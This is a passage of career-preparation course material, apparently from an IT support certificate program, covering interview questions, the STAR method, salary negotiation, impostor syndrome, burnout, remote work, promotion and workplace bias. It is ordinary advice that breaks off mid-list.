the field of digital marketing, most of that with Google. When I went to school, I didn’t even
know this industry existed. I majored in English because I liked reading and writing. My first
employer in digital marketing took a chance on me because of my experience with client
management and spreadsheets, and they figured they could teach me about digital
marketing. I’m glad the industry and I found each other. Google is always innovating, which
means when you work in this field you never stop learning. My first company actually ran a
blog all about the latest changes to Google Ads (then called AdWords), and because of my
English degree, I took a keen interest in the blog. In a few months, I was managing the blog,
and it was through my posts on that site that Google found me. It’s been wonderful to be on
the team that announces the latest changes and updates to Google Ads. Because of my
hands-on experience buying ads myself, I can immediately see how somebody’s workflow will
change after an announcement. I love being able to tell Google’s story to our advertisers so
that companies of all sizes can continue to find success and grow their businesses.

Joi 
Associate Product Marketing Manager

I’m Joi, an Associate Product Marketing Manager at Google with 10 years’ experience as a
content creator for YouTube and organic social channels.

Outside of work, I run my own beauty e-commerce business, an experience that has helped
me develop a plethora of skills around digital marketing and paid advertising, project
management and operations.

My entrepreneurial mindset paired with my love for creativity is what led me to a company
like Google. I thrive in ambiguity and love strategizing and solving problems from the ground
up. 

Key Takeaways 

Creating a 60-second-or-less elevator pitch is a great tool to use to quickly share who
you are. Use an elevator pitch to introduce yourself to career and business connections in the
future. You can even use your elevator pitch in other types of situations, like meeting new
friends or new colleagues.

Ask the Interviewer Questions


In addition to an interviewer asking you questions, it’s important that you ask the interviewer
questions as well. Asking questions helps you learn more about the role and it shows your
interest in the role. 

In this reading, we list several questions you should consider asking your interviewer and 
explain why you should ask the question and the intention behind it.

Why ask your interviewer questions?

One reason to ask your interviewer questions is that it helps you determine if you are
interested in the role. One mistake people make in interviews is believing they are the only
one being interviewed. Remember, you are also interviewing the organization to determine if
you would like to work there! Ask questions to help determine if the organization is a good fit
for you.

Another reason to ask questions is that it shows your interest in the role. When possible,
make your question specific to the company you are interviewing for. For example, imagine
during your pre-interview research, you come across an article discussing the company’s
entrepreneurial culture. You can mention that you read about the organization’s
entrepreneurial culture. Then, ask how that culture gets represented in the company.

When to ask your interviewer questions?

Often, at the end of the interview, the interviewer will ask you if you have questions. This is
the perfect time to ask your questions. The interview may end without any questions; that’s
OK too. It’s typically best to respect the interview time frame rather than ask questions past
the time.

If the interviewer doesn’t confirm they will allow time at the end for questions, one way to fit
them in before time runs out is to ask during the interview. When asking during an interview,
ensure the questions don’t disrupt the flow. For example, if the interviewer mentions
available training for the role, you can comment that you are interested in the company’s
training. You can then ask them what type of training is available for the position and its
delivery.

Additionally, if you are unable to ask any questions during the interview, you can follow up
with an email. Make sure your questions are directly related to the role and related to
something you are genuinely interested in.

Example questions to ask your interviewer

How do you evaluate success in this role?

This question helps you better understand what skills or qualities make someone successful
in the role. If the interviewer mentions skills or qualities you have, you can then discuss how
you applied them in your previous experience.

Can you describe the typical day of someone in this role?

It’s important to know the day-to-day activities of the position. Does this match with the type
of role you’re interested in? If it doesn’t, the role may not be a fit for you. This question also
confirms that the tasks for the role match the job description.

How would you describe the company’s culture?

A company culture is the attitudes and behaviors of the company and its employees. Asking
this question helps you better understand if the company’s culture is a fit for you. For
example, if you’d like to work for a company that supports creativity and encourages new
ideas, look for that type of information when someone describes the culture.

What do you like about working here?

Similar to the question about culture, this question provides the positive qualities of a
workplace. Ensure these qualities match with what you’re interested in for a work
environment.

Is there any training for the role and how is the training delivered?

If you’re interested in receiving training for a role, consider asking this question. Additionally,
you may want to ask how the training will be delivered, such as digitally, in-person,
shadowing a current employee, or another method. Shadowing is when you closely observe
another employee perform the role.

Do you have any questions or hesitations about my qualifications or experience?

If you ask this question at the end of an interview, it gives you a chance to address any
concerns the interviewer has about your work background. Sometimes the interviewer is
interested in an experience that you have, but you haven’t included on a resume. This is the
perfect question to address that discrepancy.

Key takeaways

When interviewing, you should ask questions to learn more about the organization and show
your interest in the role. When doing pre-interview research, write down any questions you
may have for the organization or the role. It’s a best practice to have at least four questions
prepared before the interview. If there is time available and the question seems appropriate,
ask it!

Activity Overview

In this activity, you will answer two common behavioral interview questions using the STAR
method. 

In an interview, you may be asked behavioral interview questions. These types of questions
require you to share a time when you were faced with a particular situation or had to practice
a certain skill. The STAR method is a helpful strategy for answering behavioral interview
questions in a clear, organized, and engaging way. As you’ve learned, STAR stands for
“situation,” “task,” “action,” and “result.” 

Be sure to complete this activity before moving on. The next course item will provide you with
a completed exemplar to compare to your own work. You will not be able to access the
exemplar until you have completed this activity. 

Scenario

Review the scenario below. Then complete the step-by-step instructions.

Using the STAR method to answer behavioral interview questions gives interviewers a sense
of who you are and why you’ve applied for the role. This method can make your responses
easy to follow by providing a logical structure to each story you share. Preparing and
practicing responses using the STAR method in advance can also help you feel more
confident going into an interview.

In this activity, you will prepare responses to two common behavioral interview questions.
First, you will recall and record notes about experiences you’ve had in the past that
demonstrate your key skills. Then, you will select two questions from a list of frequently
asked behavioral questions in IT support interviews. You will answer each of these questions
using the STAR method. And optionally, you will practice answering these questions and
others aloud in front of a mirror, friend, or family member. 

Step-By-Step Instructions

Step 1: Access the template

To use the template for this course item, click the link below and select “Use Template.” 

Link to template: STAR responses

OR

If you don’t have a Google account, you can download the template directly from the
attachment below.

Template_ STAR responses

DOCX File

Step 2: Identify experiences that demonstrate your skills


Research the most common IT support related skills that companies are looking for by
reviewing job descriptions on platforms like Indeed, LinkedIn Job Search, or CareerBuilder.
Then, consider the experiences you’ve had that demonstrate those types of skills. These may
be past work experiences, school projects, volunteer positions, or any other relevant
activities you’ve done—even the completion of this program. 

Add notes on at least three of those experiences to the Experiences that demonstrate my
skills section of the STAR responses template.

Step 3: Select interview questions

During a job interview, you may be asked behavioral interview questions. Your answers to
these questions should demonstrate how you handled a specific situation in the past and
indicate how you might handle a similar situation in the future. 

Review the list of Common Behavioral Interview Questions for IT Support Professionals on
the second page of the STAR responses template. Consider which questions would allow you
to describe the experiences you recorded in Step 2. Then, select two of the questions to
answer, copy them, and paste them in the Question 1 and Question 2 sections of the
template.

Step 4: Describe the situation

Using the STAR method helps organize your responses following a story-like structure. To
review, STAR stands for “situation,” “task,” “action,” and “result.”

Begin by describing a particular situation, challenge, or event you experienced. First, review
Question 1 and the experiences you added to the STAR responses template. Select an
experience you had that relates to the question. Then, in the Situation section, add 2–3
sentences describing the situation. Be as specific as possible, providing enough detail to help
the interviewer understand the context in which the situation took place. 

Step 5: Describe your task


Next, relate that situation to a task that you were required to complete. 

In the Task section, add 1–2 sentences describing what you were asked to do, how you were
involved, or what you were responsible for in the situation. Explain exactly how you fit into
the story you’re telling.

Step 6: Explain the actions you took


Now that you’ve given the interviewer a sense of what your role was, explain the action you
took to meet the challenge or solve the problem.

In the Action section, add 2–4 sentences describing the action or actions you took to
accomplish the task. Give specific details that demonstrate your abilities and skills. This part
of your response may take the most time to cover, as you can highlight multiple skills here.  

Step 7: Share your results


Finally, share the results that you achieved. 

In the Results section, add 2–4 sentences discussing the outcome of the actions you took and
the impact you had. Where possible, use data—such as numbers and percentages—to
reinforce your response. If you’re sharing an experience that came with challenges, you may
also want to share the lessons you learned. 

Step 8: Answer the second question


Repeat steps 4–7 to answer Question 2 using the STAR method.

(Optional) Step 9: Practice your responses aloud


To prepare yourself to answer these types of questions verbally, practice your answers out
loud in front of a mirror or with a friend or family member. Try answering additional
questions from the list of Common Behavioral Interview Questions for IT Support
Professionals in the same manner. 

Pro Tip: Save the template


Finally, be sure to save a blank copy of the STAR responses template you used to complete
this activity. You can use it for further practice or in your professional projects. This template
will help you work through your thought processes and demonstrate your experience to
potential employers.

What to Include in Your Response

Be sure to address the following criteria in your completed STAR responses:

• A description of three experiences that showcase your skills
• A selection of two interview questions to answer
• A description of the following as it relates to each question:
  o A situation you experienced (2–3 sentences)
  o The task you were asked to complete or your responsibility in the situation (1–2 sentences)
  o The actions you took to meet the challenge or solve the problem (2–4 sentences)
  o The result of your actions (2–4 sentences)


Prepare for Interviews with Interview Warmup

Now that you have the skills and knowledge to work as an IT support professional, it’s time to start
preparing for interviews. Interview Warmup is a tool that helps you practice answering questions to get
more confident and comfortable with interviewing.

Get started

Follow these steps to start a 5-question practice interview related to IT Support: 

1. Go to grow.google/interview-warmup.
2. Click Start practicing.
3. Select the “IT Support” practice set.
4. Click Start.

It takes about 10 minutes, and the questions will be different every time. Each question set will have two
background questions, one behavioral question, and two technical questions, simulating what you would
encounter in a real interview. You can try as many practice interviews as you want.

You’ll also have the option to access the full list of interview questions if you’d like to review more of the
questions available or focus on specific topics.

How it works

Interview Warmup asks interview questions for you to practice answering out loud. It transcribes your
answer in real time so you can review what you said. You’ll also review insights, which are patterns
detected by machine learning that can help you discover things about your answers and identify ways to
keep improving.

Here are a few examples of questions the tool might ask:

• Your manager asks you to make a training program for all employees after a big security vulnerability incident. What kind of training would you create, and why?
• Why is it important that you can manage your entire fleet of desktops and servers via enterprise management software?
• How do you stay up to date with recent security incidents, threats, or defense methods?
• You've been put in charge of upgrading a company's desktop machines to the latest versions. There are about 200 employees. How would you approach this?
• A company is configured to take full backups every 14 days, and differential backups every day. Describe some pros and cons for this setup.
• Why would a company spend resources on multiple technologies like network firewalls, desktop firewalls, anti-virus software, and network scanners instead of just relying on one?

Here are some of the insights that Interview Warmup provides:

• Talking points: The tool lets you know which topics you covered in your answer, such as your experience, skills, and goals. You’ll also be able to view other topics that you might want to consider covering.
• Most-used words: The tool highlights the words you used most often and suggests synonyms to broaden your word choices.
• Job-related terms: The tool highlights the words you used that are related to the role or industry in which you are preparing to work. You’ll also be able to view an entire list of job-related terms that you might want to consider including in your answer.

Interview Warmup gives you the space to practice and prepare for interviews on your own. Your responses
will be visible only to you, and they won’t be graded or judged.

Key takeaways

Practicing for interviews is an important skill for your career in IT support. Using Interview Warmup can
help you practice interview questions and receive feedback in real time. As you practice, you will gain
confidence and be able to prepare more polished responses for common interview questions.

Before you Accept, Negotiating the Contract


Picture this: you have made it through the end of the interview process and, great news, the
hiring manager wants to offer you the position. Your first instinct may be to accept the offer
without paying attention to all the details in the offer contract. You should resist this instinct
and do your due diligence. Read through the offer letter carefully, looking at what is offered
aside from salary, compare it with what is expected for the role, and most importantly
remember that this is a negotiation, and you have power in this situation. Negotiating a job
offer is an essential part of the interview process, even for entry-level roles. Let's take a closer
look at how to be prepared when the time comes.

Research

Hopefully by this time, you will have done your research on the role, not only on the
qualifications for the job, but also the average salary expectations. Knowing the average
salary for an IT support technician in your location is the best way to determine if the offer
you received is fair. Keep in mind what makes you stand out as a candidate as it might give
you insight as to whether you should ask for more or identify when you have received a
generous offer. Always ask for the range that the team is targeting and which components of
the offer the company will consider. For example, does the company offer sign-on bonuses?
Additional equity? Merit increases? This will give you an idea not just of what you are
receiving at the moment but the potential for growth as well.

Don’t just focus on money


A salary that compensates you well for your work is great, but you must also consider
benefits. You want to keep in mind some of the things that are important to you and whether
or not a potential employer can provide access to them as a part of your compensation
package. This would include sign-on bonuses, vacation days, paid time off, sick days,
retirement plans, healthcare coverage, and more. If they are unable to increase your starting
salary, you may want to explore asking for benefits or more perks to be included in your
starting package. 

Negotiate

In certain cases, you might be asked if you have a rate or salary range in mind at the
beginning of the interview process. While this question might seem straightforward, it is
important to not respond with a specific number before knowing the actual number for the
role because the moment you do, you will be giving up negotiating power. 
A contract negotiation often starts with the potential employer providing you with an offer
letter with general details about your compensation package. This is their initial offer, and
companies will often expect you to request changes to the package, whether it be more money
or additional benefits. This is referred to as a counteroffer. Once a counteroffer is made, the
potential employer will try to reconcile what you are asking for with what they initially
proposed and find a middle ground if possible.

Always remember that negotiation is your right and it is not considered impolite. On the
contrary, showing initiative in negotiating displays your confidence and tenacity to advocate
for yourself. If you react with a well-researched counteroffer, it will also demonstrate that you
are intelligent enough to know your value.

Focus on long-term growth

While a negotiated offer is common, don’t be discouraged if your counteroffer is not met.
Unless you have competing offers, you will likely still decide to take the job if it’s a fair offer. If
it makes practical sense to take the initial offer, consider reevaluating in 12
months, or whenever you have amassed more experience and have more leverage to work
with.

Pay close attention to the following video, which will demonstrate an interview where the
candidate displays their negotiating abilities. 

Imposter Syndrome
Professionals in many fields including IT sometimes feel like they don’t belong in their positions. They look
at others they work with and feel like the other people are real professionals in the field and they are
impostors and are not worthy of their positions. They feel like they got into their fields through luck or
timing, and they are worried others will find out they are impostors. This is impostor syndrome. This
reading will help you understand impostor syndrome and how to deal with it if you see it in yourself. 

How do you know if you have Impostor Syndrome?

• You feel like all the success you have in your career came from luck, not learning skills and working hard.
• You are afraid someone will discover you are not qualified for your position. Once someone does, you will lose your position.
• You will be perceived as dishonest, and you won’t be able to work in your field again.
• You feel like you need to put a lot of extra effort in to try to be worthy of the position.
• If you do something well and your team members or supervisors praise you, you feel you are not worthy of the praise.
• You sometimes don’t try to reach for goals because you feel like they are unattainable goals.

How to deal with Impostor Syndrome

First, don’t feel bad about yourself if you have Impostor Syndrome. Many professionals in your field share it
with you. There are even Nobel Prize winners who have impostor syndrome. It’s very common. You are not
an impostor, though. You worked hard to get this far. Here are some ways to deal with impostor syndrome:

• Look at all you’ve done in the course and in your experiences. Keep a journal of all your accomplishments. Every time you think of another one, write it in the journal. Be sure to include your achievement of successfully completing this IT Support Specialist certificate. When you feel like an impostor, read through your journal and look at what you have already accomplished. Write down any new accomplishments in the journal as you make them.
• Become a teacher - teach someone about your field. Let them ask questions and answer those questions the best you can. You might find out you know a lot more about the field than you thought you did.
• Take out your accomplishment journal sometimes, read it, and celebrate your accomplishments. You can even reward yourself with something you really want and celebrate your success.
• Every time you doubt yourself, think about a real problem you solved or an important task you completed successfully on the job. Find something good you did that week. Maybe you were able to troubleshoot a problem others struggled with, and you solved the problem successfully. Acknowledge your accomplishments and you will find plenty of proof you are very worthy of your position, and you are a true professional in your field - not an impostor.

Taking risks

Once you have beaten impostor syndrome and proven to yourself you are worthy of your position, you may
fail in a task or on a project and feel like an impostor again, or a failure. Even the most well-known
professionals, scientists, inventors, and other innovators have failed, and they have failed often. Failure
does not make you an impostor. Instead, by learning from your failures, you will become even better at
what you do.

To move ahead in your career, sometimes you need to take risks. Here are some tips for dealing with risk:
• When you fail at something, learn from the failure. What went wrong, and how can you do it better next time?
• Examine each project or task carefully, and think about it succeeding. What is the outcome? It may take a few failed tries to get to that outcome, but if you never start, you will never achieve that outcome.
• Find others on the team who have done similar projects. Ask them for advice about how they worked on those projects. If the project fails, share what you learned with them and ask them for advice on how to avoid the same problem from happening again.

Safe identity workspaces

Safe identity workspaces are a recent development in workplace environments, and their design lets
employees share their ideas freely. In these spaces, employees feel a strong sense of belonging. They feel
like essential parts of the team, and are less likely to be intimidated. In your career, you may work in one of
these environments, as many companies are moving toward them and away from traditional offices. 

In a safe identity workplace, there is a leader, but the leader pays close attention to what the employees
have to say and acts on their suggestions and ideas. In some of them, managers and supervisors are open
to constructive criticism from the team. All team members in the workspace are treated as equals and
encouraged to move forward in their careers. 

Key takeaways

• Impostor Syndrome happens when a professional in a field feels unworthy of their position. People with impostor syndrome are scared someone will find out they are impostors and that they got their positions through luck and timing.
• You can fight impostor syndrome by beating self-doubt and using your accomplishments to prove to yourself you are a worthy professional in your field.
• Failure is always a possibility, but if you don’t take risks, you won’t move forward in your career. Learn from your failures.
• Safe identity workspaces are a recent development, and they provide a workspace where everyone is treated as an equal. This encourages creativity and helps employees see themselves as important members of the team.

Working from Home for the Win (WFH FTW)

Working from home is increasing in popularity. Every day, more and more employees want to work from
home. At the same time, more and more companies are evaluating the pros and cons of having employees
work from the comfort of their homes and are looking for options they can provide to their employees,
such as working from home full time or developing a hybrid model.

Working from home has its benefits. You are independent, no longer commuting, and more productive. You
save money on gas and clothing while having more quality time with family and friends, an
improved work-life balance, a flexible schedule, and more job opportunities, to mention a few.
What about a hybrid model? A hybrid model means some days at home and some days at the office. This
raises questions, like how to choose which days to work at home? How many days in a week? A hybrid work
schedule is a flexible approach where the employee and the employer agree on a mixed work environment
of working from home and working at the office.

But the reality is, no matter if you are a full time or a hybrid work-from-home employee, you will need to
set up your home work environment to suit your job responsibilities.

When working from home, you will need some standard and basic services and accommodations like a
reliable high-speed internet connection, a computer or laptop, a phone, headset, desk, and chair.
Depending on your job, you may also need to have an accessible printer, some specific programs, an extra
monitor, and so on. Also, you will need to have a noise- and distraction-free environment. As an IT support
specialist working from home, if you are traveling to the customer location, you will need to have a toolbox
with the necessary tools to do your job, along with a reliable means of transportation.

One of the challenges of working from home is scheduling your work week and staying organized. Before
starting to work from home, make sure to set some ground rules:

• Decide your working hours: when you start your day, when you end it, lunch time, brain breaks, etc. After you decide your working hours, try to stick to them as much as possible.
• Plan your working tasks. Keep track of assignments for the month, the week, and the day. It will keep you organized and help you to meet your deadlines.
• Set some working rules with your loved ones. Establish when it is appropriate to get your attention, appropriate noise levels, and what is considered an emergency.
• Create boundaries between your work and your household chores.
• Learn how to prioritize your work.

Now that you have all that you need to start working from home successfully, it is time to learn to take
advantage of the tools available to enhance collaboration. There are a few tools that will improve your
productivity when working from home. Depending on your job, you will have these tools set up by your
employer, or maybe you will have the flexibility to choose the one that is right for you. Whatever is the case,
familiarize yourself with these types of tools:

• Calendar sharing
• File sharing
• Instant messaging
• Document synchronization
• Cloud storage
• Video-conferencing

Key takeaways

To successfully work from home:

• Set your work space to be comfortable for you
• Set a working schedule that works for you
• Be sure to have all the tools, software and equipment you need to perform your duties
• Take advantage of all the tools available for you to make your job productive

Burnout
Burnout is prevalent in every possible industry and negatively affects work performance,
interests in personal life, relationships, and health. Burnout occurs when there is excessive
stress surrounding a job. As you progress through your career in IT Support, it’s important to
recognize symptoms of burnout and work on managing the symptoms in advance.

Career Burnout

Some of the many reasons why burnout occurs are as follows:

• Unclear purpose at your work.
• The job is overly demanding.
• The work is unclear.

There are also many common signs of burnout, including:

• Constantly exhausted
• Physical pain such as migraines, headaches, muscle aches and pains, and
• Changes in appetite
• No longer interested or have enough energy to engage in activities outside of work
• Changes in your sleep. If you notice you are suddenly sleeping way more or way less than usual, it might be a symptom of burnout.

Identifying burnout triggers

It’s equally important to take time to reflect on what is contributing to your burnout symptoms
and experiences. A lack of agency is one of the root causes of burnout. A lack of agency occurs
when you feel like you’re not in control of your current situation: you have no opportunity to
progress in your career at your company, you face financial restrictions, you feel that there’s not
enough time to get things done, or you lack recognition in the workplace. Not getting enough
rest or sleep also contributes a lot to burnout. When we don’t get enough sleep, we are not as
productive, have trouble focusing, and have a lower pain tolerance. Do you feel like you are in a
constructive community? Feeling like you’re alone in the workplace can lead to burnout. If
you’re working at a job that doesn’t give you a sense of purpose, it might be time to
reconsider your options. Completing tasks that are not fulfilling to you or that do not utilize all your
skills impacts the quality of your work and can lead to burnout.

Repairing causes of burnout

One of the main ways to decrease symptoms of burnout is to reframe your thoughts around
the current situation. It’s also beneficial to reach out for help from Human Resources,
your supervisors, or other colleagues. For example, if you feel like your work has no sense of
purpose, notify your supervisor and ask if there are other tasks or positions within your
organization that allow you to work on projects and teams that give you a sense of fulfillment
and purpose. Resetting expectations also greatly helps with repairing burnout. Take
inventory of what the contract deliverables are for your current position, assess whether you
are meeting those deliverables, and then take note of your own expectations of the position
up until that moment in time.

Sustainable workplaces

Working for a company that grants its employees schedule flexibility, mental health
resources, and manageable workloads can bring peace of mind and help your career in the
long run by supporting your health and well-being. Flexible schedules allow employees to
attend life events such as medical appointments, family matters, and related matters at times
that work best for the employee. Some companies will support mental health days and allow
you to take paid time off (PTO) to rest, recover, and recharge.

Create a Career Development Plan

There are several components and aspects of your potential career to consider while you are
job searching. Before embarking on your journey, it is important to outline your career path.
Doing so will help you find opportunities that align with your values, interests, and
aspirations. As an IT support professional, you have a myriad of options available to you.
Every industry is hiring IT professionals to assist with troubleshooting issues, recommending
solutions, providing quality customer service, and sometimes serving as the subject matter
expert for the company’s technological resources.

Identifying career goals

What do you want to accomplish as an IT professional? There are multiple specialist fields in
the industry that will give you the opportunity to further develop and hone your skills in
specific areas. However, you can just as easily take the generalist route and cross-apply your
knowledge of technology and tech support to various roles. What type of work environment
do you want to work in? Some companies provide lots of in-office perks such as a
comprehensive kitchen with free snacks, unlimited PTO, and team-building community
events. Other workplaces include flexible work schedules and options that allow you to work
from home, in the office, or a hybrid. Having a general idea of what you’re looking for in a
work environment will help you narrow down your job search and land opportunities that are
a better fit for you. Additionally, do you aspire to eventually work in management in any
capacity? If so, it’s important during your job hunt to ask about opportunities for
advancement or transition throughout the company. Some companies are limited in
opportunities due to long-term employee retention or other factors.

What are the unique strengths and skills that you bring with you to a company? Identifying
your strengths, both soft and hard skills, will help you stand out from other applicants. There
are a plethora of transferable skills that you can leverage in your application. If you’re not
sure where to start on identifying your unique strengths and your transferable
skills, there are lots of online resources and platforms to help you get an idea. Skill stacking is
becoming more appealing to hiring managers and companies within the field of technology.
Skill stacking is when employees combine skills from different fields or industries to produce
novel ideas, approaches, and systems. Soft skills are the most important skills to have if
you’re considering any position in management or if you want to work in a team-based work
environment. Having the skills to hold conversations, navigate conflict, and collaborate with
others will greatly benefit your career.

Creating a timeline

A common interview question is “Where do you see yourself in X years?”
Creating a timeline for you and your career is helpful in gaining insight into what
career opportunities will work best for you moving forward. One helpful way to gain clarity
into this is to break down your bigger career goals into smaller goals.

Approach your job search and career in IT with an open mind. Be flexible with deadlines,
milestones, and your own personal timeline. Be receptive to potential job opportunities that
you might not traditionally apply to or pursue. Adaptability and flexibility are two of the most
coveted soft skills employers look for in their employees. Lastly, hold yourself accountable for
your own progress. Technology is always changing and staying informed of all the changes
that pertain to your job or specialty will give you an advantage over other employees. Look at
taking other certifications, take online courses, read books on the subject, attend
conferences, continuously network with other professionals in your field, and/or complete
passion projects in your free time. Taking extra measures to inform yourself about your field
and attending events with other professionals will greatly increase your chances of success
and career satisfaction.

Getting Promoted
As you are starting to look for an entry level job in IT support, consider why you should start
thinking about a promotion.

There are two main reasons to start job planning for a promotion: 1) Since you are prepared
and committed to do your best from day 1, you will give an amazing first impression and
probably get noticed from the beginning; 2) Knowing where you want to be in 5 to 10 years
will help you successfully plan for your growing career. You know that you have the tools to
successfully start your career as an IT support professional. Now is the time to plan for what
to do next, with special consideration as to what IT path to continue. Perhaps you're
interested in furthering your knowledge in networking, help desk support, or cyber security.
What are the growth opportunities in your organization? Do they support training? Is this a
transitional job? Is this your dream job? All these questions must be taken into account when
planning your next steps.

After you answer those basic questions, you have to prepare and pace your next steps
accordingly. If you are planning to grow within your organization, there are a few
considerations that you want to evaluate to get to the place where you want to be.

The first thing to consider when planning for a promotion is performing beyond average at
your current position. This means proving to your employer that you are not only capable of
doing your current job, but that you are capable of taking on bigger responsibilities. Now, the
question is, how do you achieve that?

• Work on your development. There are two groups of workers: the ones doing the same job every year and excelling at it, and the ones excelling at the same job while adding value to it. To get a chance at that promotion, you need to be in the second group: the employee who gives more every day and is willing to take on new responsibilities.
• Show leadership and be a team player. Showing that you are a team player and can take leadership roles will help you to get noticed by your employers. Strive to be a role model, gain your coworkers' respect, and motivate your team members. In other words, display and build qualities that will make you a good leader.
• Continue your education. When developing your career path, consider and plan for future certifications and training. For example, if you are planning to move from IT support to network administration, plan to take a few new certifications like Network+, Cisco professional certifications, and so on. Check the company's network administration job requirements and improve your skills accordingly.
• Maintain strong work ethics. Always be punctual for work, provide excellent customer service, meet your deadlines, excel at your job, be respectful, and collaborate with your coworkers.
• Communicate with your boss, your coworkers, and your customers. Good communication is a key characteristic to display in any type of job, but when you are looking for a promotion, you need to excel in the way you communicate. Knowing how to communicate is crucial, so when planning your career path, add some communication training to your skill development.

Key takeaways
Planning for a promotion doesn't necessarily mean that you are going to get one. Sometimes
you will need to ask for it, or change roles or organizations in order to get it. But it means that
you will be ready and will be able to demonstrate your value as part of the organization every day.

Related Technical Careers
The Google IT Support Certifications are part of a bigger project called Grow with Google
(GWG).

GWG offers some other certifications that can help you grow even more and pursue advanced
job opportunities.  

The offered career certificates are:

Google IT Automation with Python Certificate

This program takes your IT foundations to the next level, teaching you how to program with
Python and how to automate common system administration tasks using it. 

Across a total of 6 courses, you will learn:

• Crash course on Python
• Using Python to interact with the operating system
• Introduction to Git and GitHub
• Troubleshooting and Debugging Techniques
• Configuration Management and the Cloud
• Automating Real-World Tasks with Python

To learn more about this certification visit:

Google IT Certificates

Google IT Automation with Python Professional Certificate

Google UX Design Certificate

Learn the foundations of user experience (UX) design with this certification, which will
prepare you to enter a fast-growing career field. Through its 7 courses, this certification
will teach you:

• Developing personas, user stories, and user journey maps
• Conducting usability studies
• Creating wireframes and prototypes
• Testing and iterating on designs
• Building a professional portfolio

To learn more about this certification visit:

UX Design Certificate

Google UX Design Professional Certificate


Google Project Management Certificate

Take your first steps into the field of project management with this professional certificate
developed by Google. Learn about:

• Estimating time and budgets
• Running effective meetings and managing stakeholders
• Identifying and managing risks
• Applying Agile and Scrum frameworks
• Leadership skills and navigating team dynamics

To learn more about this certification visit:

Project Management Certificate

Google Project Management: Professional Certificate

You can also grow your career by taking any of these Google Cloud professional certifications:

Cloud Network Engineer Professional Certificate

Networking in Google Cloud Specialization

Security in Google Cloud Specialization

Social Emotional Skills

More employers are seeking candidates who bring a combination of social skills and
emotional intelligence skills in addition to the traditional technical skills. Providing quality
customer service, being a good communicator, and developing positive relationships with
coworkers help employees stand out. Possessing good social and emotional skills will help
leverage all your relationships from personal to professional.

Prioritizing your workload is a critical skill that will save you a lot of time and stress, and can help
you prevent burnout in the long haul. There are multiple tools, apps, and online resources
that can assist with time management, to-do lists, and tasks. Find a method or approach that
works for you. There is no one solution that works for everyone; stay curious about different
approaches to your organization and time management strategy. Break your big projects and
tasks into smaller tasks to make them more manageable and more rewarding. Focus on what
outcomes you want to achieve by completing a specific task or goal.

Procrastination is a major hindrance to productivity and work satisfaction. While it is normal
to experience a little bit of procrastination, it is detrimental if it means you are completing the
majority of your work very close to proposed deadlines, working overtime, experiencing
trouble with focus, or working on the weekends to make up for lost hours of productivity due to
procrastination. Identify things that distract you from your work and reflect back on times
when you did procrastinate. What were some common items, events, or settings that
distracted you from focusing on your work? Our work environment has a big influence on our
focus and productivity. Workplaces that have a lot of decorations, pictures, pets looking for
our attention, or loud music playing in the room, or working in a busy cafe, are some examples of
environments that can distract us. Notice what settings you feel the most productive in and
aspire to create a work environment that emulates that. Everyone is different; approach this
exploration with an open mind and make it work for you.

Confidence is the cornerstone of success. It’s a critical skill that will help you be seen as a
leader within your workplace and eventually lead to more opportunities for advancement or
raises. Having confidence additionally helps you provide better quality customer service to
clients while working in the field of IT support. Building positive relationships with clients will
ensure they return to you for technical support, and your confidence will guide them to
trust your expertise to a greater degree than they would a less confident professional.
Regulating emotions also goes a long way in career success.

Practicing empathy with coworkers and clients further develops a positive relationship with
them. Everyone loves to feel like they’re understood and supported in their endeavors. It’s
equally important that you take time to practice self-compassion and self-forgiveness. If you
ever feel overwhelmed by the number of tasks you have to complete or don’t understand the
nature of your assignment, always reach out to your colleagues and supervisors for
assistance. You are not in it alone, and everyone in the IT field has been a novice at some point
in their career. Reach out to your team to gain clarification on the expectations for your role,
to brainstorm ideas about making your work more efficient, or to revise your workload if you are
assigned more than what you’re able to complete without burnout.

Diversity, Inclusion, and Bias

Diversity and Inclusion
In the simplest terms, diversity means something that is different from the norm. Diversity in the workplace
represents how organizations and their employees connect, engage, and respect people across all types of
differences. More companies are beginning to emphasize their Diversity, Equity, and Inclusion (DEI) metrics
as a way to stand out from their competitors. Companies with good DEI metrics tend to have higher
employee retention rates, more satisfied employees, and increased innovation.

Diversity starts at the very top with a company’s executive leadership. Examine the leadership at the
company you want to work for. The people working at the executive level are typically a good indicator of
how diverse and well-represented their employees are as well. If a company’s executive leadership does
not embrace diversity, the employees will experience greater difficulties in creating and maintaining that
culture. Some questions to ask yourself as you are conducting research on companies:

• Does the company share their progress openly?
• Do they provide education and training opportunities to learn more about DEI and how people in the workplace are impacted?

There are several ways to assess whether or not a company practices diversity and inclusion. Here are a
few resources to explore and gain better insights on the company:

• The company’s website. Assess their core values, history, mission statement, and keywords. See if their website includes any photographs of their employees.
• Their social media page(s). What kind of pictures and content do they post publicly? Check for photos of their employees, community outings, and whether or not they recognize or celebrate various events or historical moments such as Pride Month, Black History Month, or World Mental Health Day, as a couple of examples.
• Interview former employees. Conduct informational interviews to learn more about a company in general and ensure that the workplace culture will be a good fit for you.

Unconscious/Implicit Bias
Unconscious or implicit bias refers to the attitudes, stereotypes, judgements, or prejudices that we hold
unconsciously in our brain. This bias alters our reactions, thinking, and predisposition to information,
actions, or environments in a particular way, whether positive or negative, without our being aware
that it is happening. It occurs beyond our control and can impact our decisions, actions, and
understanding.

Unconscious bias is present, to some degree, in every single person and is developed from an early age
through the course of one's life. Unconscious bias is associated with many characteristics such as race,
ethnicity, gender, religion, sexual orientation, socioeconomic background, and educational background.
Some of the common types of unconscious bias are:

• Affinity bias, which refers to preferences when choosing people to connect with. These people share similar interests, experiences, and backgrounds to your own.
• Attribution bias, which refers to the ways you perceive your actions in comparison to others. This bias is mostly associated with how you perceive success and failure.
• Ageism, which refers to negative feelings or discrimination against someone based on their age.
• Beauty bias, which refers to relating a person's physical appearance to their success, competence, and/or qualifications.
• Gender bias, which refers to a preference for one gender over others.
• Ableism bias, which refers to perceiving able-bodied people as the norm and believing that people with disabilities should strive to perform at the same level as able-bodied people without necessary accommodations (examples: reserving a meeting space that is not wheelchair accessible, assuming people have to have a visible disability to be considered disabled, framing disability as something tragic or as an inspiration).

In order to identify our own biases, it’s important to know some of the causes of
unconscious/implicit bias. Bias occurs because, as human beings, we are susceptible to tendencies and are
creatures of habit. For example, humans tend to seek patterns, our brains are known to simplify the world,
and we are influenced by culture and/or media.

The truth is that no matter what the causes are, we are susceptible to implicit bias, and this could affect
our relationships at work, the way we behave on certain occasions, the decisions we make, and how we
react in our work environment.

The first step that we can take to remediate this behavior is to recognize that we are susceptible to bias
and to identify it. The next step is to take actions that reduce the implicit bias at work. Some corrective
measures that can be taken are:

